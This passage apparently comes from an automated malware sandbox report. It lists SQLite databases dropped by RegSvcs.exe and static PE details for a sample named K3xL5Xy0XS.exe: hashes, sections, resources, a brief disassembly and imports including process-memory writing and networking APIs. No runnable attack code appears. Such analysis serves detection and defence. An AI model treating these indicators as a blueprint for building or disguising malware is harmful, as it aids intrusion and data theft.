                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.874117767647439
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:K3xL5Xy0XS.exe
                                                                                File size:1'058'304 bytes
                                                                                MD5:6afdd0cbdf70f3e75f423b1557648e85
                                                                                SHA1:6c5cf72a38f08fd41b9f4943efaa4fa3b4d92c66
                                                                                SHA256:f5a76af6335f9ea831901a5fac818c22393fdb2d0d9408ce373018b24a2ddb71
                                                                                SHA512:b550dbba19c53f55d1433cfbd38fff724c9759da4232597f1b3213e98529f440854a32387eb4a7a7aea2b6a2601816e13b0cfd2ab8712c2f6ef0ec66a2c5028d
                                                                                SSDEEP:24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8abXTaR:ATvC/MTQYxsWR7abX
                                                                                TLSH:9835AF027391C062FF9BA2334F5AF6515BBC69260123E62F13981D79BE701B1563E7A3
                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                Icon Hash:aaf3e3e3938382a0
                                                                                Entrypoint:0x420577
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67635B63 [Wed Dec 18 23:31:47 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                Instruction
                                                                                call 00007FE8B4B0E2C3h
                                                                                jmp 00007FE8B4B0DBCFh
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                push dword ptr [ebp+08h]
                                                                                mov esi, ecx
                                                                                call 00007FE8B4B0DDADh
                                                                                mov dword ptr [esi], 0049FDF0h
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                mov eax, ecx
                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                mov dword ptr [ecx+04h], 0049FDF8h
                                                                                mov dword ptr [ecx], 0049FDF0h
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                push dword ptr [ebp+08h]
                                                                                mov esi, ecx
                                                                                call 00007FE8B4B0DD7Ah
                                                                                mov dword ptr [esi], 0049FE0Ch
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                mov eax, ecx
                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                mov dword ptr [ecx+04h], 0049FE14h
                                                                                mov dword ptr [ecx], 0049FE0Ch
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                mov esi, ecx
                                                                                lea eax, dword ptr [esi+04h]
                                                                                mov dword ptr [esi], 0049FDD0h
                                                                                and dword ptr [eax], 00000000h
                                                                                and dword ptr [eax+04h], 00000000h
                                                                                push eax
                                                                                mov eax, dword ptr [ebp+08h]
                                                                                add eax, 04h
                                                                                push eax
                                                                                call 00007FE8B4B1096Dh
                                                                                pop ecx
                                                                                pop ecx
                                                                                mov eax, esi
                                                                                pop esi
                                                                                pop ebp
                                                                                retn 0004h
                                                                                lea eax, dword ptr [ecx+04h]
                                                                                mov dword ptr [ecx], 0049FDD0h
                                                                                push eax
                                                                                call 00007FE8B4B109B8h
                                                                                pop ecx
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                mov esi, ecx
                                                                                lea eax, dword ptr [esi+04h]
                                                                                mov dword ptr [esi], 0049FDD0h
                                                                                push eax
                                                                                call 00007FE8B4B109A1h
                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                pop ecx
                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x2ba64.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000x7594.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0xd40000x2ba640x2bc00c3b7286dd98abfbcbeabf90a9f069624False0.8480580357142857data7.689522450358481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x1000000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                RT_RCDATA0xdc7b80x22d2bdata1.0003575559995794
                                                                                RT_GROUP_ICON0xff4e40x76dataEnglishGreat Britain0.6610169491525424
                                                                                RT_GROUP_ICON0xff55c0x14dataEnglishGreat Britain1.25
                                                                                RT_GROUP_ICON0xff5700x14dataEnglishGreat Britain1.15
                                                                                RT_GROUP_ICON0xff5840x14dataEnglishGreat Britain1.25
                                                                                RT_VERSION0xff5980xdcdataEnglishGreat Britain0.6181818181818182
                                                                                RT_MANIFEST0xff6740x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                DLLImport
                                                                                WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                UxTheme.dllIsThemeActive
                                                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
